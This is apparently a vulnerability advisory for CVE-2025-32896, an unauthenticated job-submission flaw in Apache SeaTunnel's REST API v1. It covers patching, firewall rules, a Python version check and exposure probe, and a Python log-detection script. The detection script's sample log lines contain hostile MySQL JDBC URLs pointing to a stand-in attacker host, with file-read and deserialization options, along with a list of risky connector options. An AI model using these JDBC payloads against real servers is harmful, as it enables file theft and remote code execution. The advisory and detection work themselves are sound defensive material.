CVE-2025-32896

6.5 MEDIUM

📋 TL;DR

Unauthenticated attackers can submit a crafted job to Apache SeaTunnel's REST API v1 endpoint (`/hazelcast/rest/maps/submit-job`). Because the job definition is accepted without any credentials, a malicious MySQL JDBC connection URL inside it can make the server read arbitrary local files and perform a deserialization attack. All SeaTunnel installations running version 2.3.10 or earlier with REST API v1 enabled are affected; version 2.3.11 fixes it. Since the deserialization path can lead to remote code execution, an exposed instance should be treated as fully compromisable without authentication.

💻 Affected Systems

Products:
  • Apache SeaTunnel
Versions: <=2.3.10
Operating Systems: All operating systems running Apache SeaTunnel
Default Config Vulnerable: ⚠️ Yes
Notes: Affects installations with REST API enabled (default configuration). The vulnerability is in the API v1 endpoint.

📦 What is this software?

Apache SeaTunnel is a distributed data integration platform: jobs are described as source/transform/sink connector pipelines and submitted to its Zeta engine (or to Spark/Flink). The Zeta engine embeds Hazelcast, which is why the vulnerable v1 REST endpoint lives under the `/hazelcast/rest/maps/` path.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise through deserialization leading to remote code execution, sensitive file exfiltration, and complete control of the SeaTunnel instance.

🟠

Likely Case

Unauthorized file reads exposing configuration files, credentials, and sensitive data, potentially leading to further system compromise.

🟢

If Mitigated

Limited impact if proper network segmentation and authentication controls are in place, though the vulnerability still exists.

🌐 Internet-Facing: HIGH - Unauthenticated remote exploitation makes internet-facing instances extremely vulnerable.
🏢 Internal Only: HIGH - Even internal instances are vulnerable to any network-accessible attacker.

🎯 Exploit Status

Public PoC: No
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The vulnerability requires no authentication and involves simple HTTP requests to a known endpoint with crafted parameters.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.3.11

Vendor Advisory: https://lists.apache.org/thread/qvh3zyt1jr25rgvw955rb8qjrnbxfro9

Restart Required: Yes

Instructions:

1. Download Apache SeaTunnel 2.3.11 from official sources.
2. Stop the SeaTunnel service.
3. Replace the installation with version 2.3.11.
4. Enable REST API v2 and HTTPS two-way authentication.
5. Restart the service.

🔧 Temporary Workarounds

Disable REST API v1

Platform: all

Completely disable the vulnerable REST API v1 endpoint to prevent exploitation.

Set `rest.api.enable` to `false` in the SeaTunnel configuration (confirm the exact key against your version's configuration files), or remove/block access to the `/hazelcast/rest/maps/submit-job` endpoint. Restart the service afterwards so the change takes effect.

Network Access Control

Platform: linux

Restrict network access to SeaTunnel REST API endpoints using firewall rules.

# Replace [SeaTunnel_PORT] with the port that serves the REST API and [TRUSTED_IPS] with
# the address or CIDR allowed to submit jobs (repeat the ACCEPT line once per trusted range).
# Use -I instead of -A if an earlier rule in the INPUT chain would accept the traffic first.
iptables -A INPUT -p tcp --dport [SeaTunnel_PORT] -s [TRUSTED_IPS] -j ACCEPT
# Everything else that reaches the port is dropped.
iptables -A INPUT -p tcp --dport [SeaTunnel_PORT] -j DROP

🧯 If You Can't Patch

  • Implement strict network segmentation to isolate SeaTunnel instances from untrusted networks.
  • Deploy a web application firewall (WAF) with rules to block malicious requests to the vulnerable endpoint.

🔍 How to Verify

Check if Vulnerable:

Check if SeaTunnel version is 2.3.10 or earlier and REST API v1 is accessible at /hazelcast/rest/maps/submit-job without authentication.

Check Version:

Check SeaTunnel configuration files or run `seatunnel --version` if available in your installation.

Verify Fix Applied:

Verify that the installation reports version 2.3.11 or later, confirm that REST API v1 is disabled or protected, and test that unauthenticated requests to `/hazelcast/rest/maps/submit-job` are rejected.
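The checks above, as an added example (not code from the advisory or from the SeaTunnel project): a version comparison against the fixed release and a credential-less probe of the v1 submit-job endpoint. Assumptions: version strings contain an x.y.z triple, every version below 2.3.11 counts as affected (the page's "<= 2.3.10"), and the way the probe reads HTTP status codes is a heuristic rather than vendor-documented behaviour of the endpoint.

```python
"""Verification helpers for CVE-2025-32896 (added example, not project code).

Assumptions: x.y.z version strings; everything below 2.3.11 is affected; the
probe's reading of status codes is a heuristic, not vendor-specified behaviour.
"""
import re
import sys
import urllib.error
import urllib.request

V1_SUBMIT_JOB = "/hazelcast/rest/maps/submit-job"
FIRST_FIXED = (2, 3, 11)


def parse_version(text):
    """Pull the first x.y.z triple out of a version banner, file name or config value."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no x.y.z version found in {text!r}")
    return tuple(int(p) for p in m.groups())


def is_affected(version_text):
    """True when the running version is older than the fixed release 2.3.11."""
    return parse_version(version_text) < FIRST_FIXED


def classify_status(status):
    """Heuristic reading of the status returned to an unauthenticated POST with an
    empty body (assumption: 404 means v1 is not served, 401/403 means it is
    protected, anything else means the endpoint processed our request)."""
    if status == 404:
        return "v1 endpoint not served"
    if status in (401, 403):
        return "v1 endpoint present but rejects unauthenticated requests"
    return "v1 endpoint accepts unauthenticated requests (exposed)"


def probe_v1_endpoint(base_url, timeout=5.0):
    """POST an empty JSON object to the v1 submit-job endpoint without credentials.
    The empty body is deliberate: it cannot describe a runnable job, so this tests
    exposure without submitting real work to the cluster."""
    url = base_url.rstrip("/") + V1_SUBMIT_JOB
    req = urllib.request.Request(
        url, data=b"{}", method="POST",
        headers={"Content-Type": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status = resp.status
    except urllib.error.HTTPError as err:
        status = err.code
    except (urllib.error.URLError, OSError) as err:
        return {"url": url, "status": None, "verdict": f"unreachable: {err}"}
    return {"url": url, "status": status, "verdict": classify_status(status)}


def assess(version_text, base_url=None):
    """Combine the version check with an optional live probe of the endpoint."""
    result = {
        "version": ".".join(map(str, parse_version(version_text))),
        "affected_version": is_affected(version_text),
    }
    if base_url:
        result["probe"] = probe_v1_endpoint(base_url)
    return result


if __name__ == "__main__":
    # usage: python check_seatunnel.py "<version string>" [http://seatunnel-host:PORT]
    print(assess(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else None))
```

Run the version check alone first (it needs no network); only point the probe at hosts you are authorized to test, and treat an "exposed" verdict as a finding to confirm by reviewing the instance's configuration, not as proof of exploitability.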

📡 Detection & Monitoring

Log Indicators:

  • Unauthorized POST requests to /hazelcast/rest/maps/submit-job
  • Job submissions whose MySQL JDBC connection URL carries parameters that reference local file paths or enable deserialization
  • Error logs showing deserialization failures or file access errors

Network Indicators:

  • HTTP POST requests to SeaTunnel REST API from unauthorized IP addresses
  • Unusual traffic patterns to the submit-job endpoint

SIEM Query (pseudo-syntax; adapt field names and the [AUTHORIZED_IPS] list to your platform):

source="seatunnel.log" AND (url_path="/hazelcast/rest/maps/submit-job" OR message="submit-job") AND (src_ip NOT IN [AUTHORIZED_IPS])
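The log and network indicators above turned into detection logic, as an added example that is not part of the advisory or of the SeaTunnel project. It runs over a few constructed audit-log lines (a proxy or WAF log that records the request body; the format is assumed) and flags submit-job POSTs that come from outside the authorized ranges or whose MySQL JDBC URL carries risky options. The list of option names is taken from the general malicious-JDBC-URL attack pattern against MySQL Connector/J, not from the page.

```python
"""Detection over constructed audit-log lines (added example, not project code).

Assumptions: log format "<ts> <client ip> "<method> <path>" <status> <body or ->",
and the RISKY_JDBC_OPTIONS list, which comes from the general malicious-MySQL-
server attack pattern rather than from the advisory.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

V1_SUBMIT_JOB = "/hazelcast/rest/maps/submit-job"

# MySQL Connector/J options that turn a client-controlled JDBC URL into a local
# file read (LOAD DATA LOCAL INFILE) or a deserialization sink. Assumption: taken
# from the general attack pattern, not from the advisory.
RISKY_JDBC_OPTIONS = {
    "allowloadlocalinfile", "allowurlinlocalinfile", "allowloadlocalinfileinpath",
    "autodeserialize", "queryinterceptors", "statementinterceptors",
    "detectcustomcollations",
}

LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>[^" ]+)" '
    r'(?P<status>\d{3})(?: (?P<body>.*))?$'
)
JDBC_RE = re.compile(r"""jdbc:mysql://[^\s"'\\]+""", re.IGNORECASE)


def risky_jdbc_options(text):
    """Return the lower-cased risky options found in any jdbc:mysql:// URL in text."""
    found = set()
    for m in JDBC_RE.finditer(text):
        # Drop the "jdbc:" prefix so urlsplit sees mysql://host:port/db?options
        query = urlsplit(m.group(0)[len("jdbc:"):]).query
        for key in parse_qs(query, keep_blank_values=True):
            if key.lower() in RISKY_JDBC_OPTIONS:
                found.add(key.lower())
    return found


def triage(log_lines, authorized_cidrs):
    """Alert on submit-job POSTs from outside the authorized ranges or carrying a
    risky JDBC URL; other requests are ignored."""
    nets = [ipaddress.ip_network(c) for c in authorized_cidrs]
    alerts = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"].split("?")[0] != V1_SUBMIT_JOB:
            continue
        ip = ipaddress.ip_address(m["ip"])
        unauthorized = not any(ip in n for n in nets)
        options = risky_jdbc_options(m["body"] or "")
        if unauthorized or options:
            alerts.append({
                "ts": m["ts"], "ip": str(ip), "status": int(m["status"]),
                "unauthorized_source": unauthorized, "options": options,
            })
    return alerts


# Constructed sample data: the scheduler subnet and four audit-log lines.
AUTHORIZED_CIDRS = ["10.20.0.0/24"]
SAMPLE_LOG = [
    # benign submission from the scheduler: ignored
    '2025-06-20T10:15:02Z 10.20.0.5 "POST /hazelcast/rest/maps/submit-job" 200 '
    '{"source":[{"plugin_name":"Jdbc","url":"jdbc:mysql://db.internal:3306/sales?useSSL=true","query":"select 1"}]}',
    # external source and file-read options in the URL: alert
    '2025-06-20T10:16:40Z 203.0.113.7 "POST /hazelcast/rest/maps/submit-job" 200 '
    '{"source":[{"plugin_name":"Jdbc","url":"jdbc:mysql://203.0.113.7:3306/x?allowLoadLocalInfile=true&allowUrlInLocalInfile=true","query":"select 1"}]}',
    # trusted source but deserialization options in the URL: alert
    '2025-06-20T10:17:01Z 10.20.0.5 "POST /hazelcast/rest/maps/submit-job" 200 '
    '{"source":[{"plugin_name":"Jdbc","url":"jdbc:mysql://203.0.113.7:3306/x?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor","query":"select 1"}]}',
    # unrelated request from outside: ignored
    '2025-06-20T10:18:00Z 203.0.113.9 "GET /favicon.ico" 404 -',
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG, AUTHORIZED_CIDRS):
        print(alert)
```

The third sample line is the case the page's SIEM query misses: a submission from an authorized address that still carries deserialization options, which is what a compromised scheduler host or a stolen job-submission path would look like. Keying the body check on the JDBC URL rather than on the job's JSON structure keeps it working for HOCON-formatted bodies as well.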
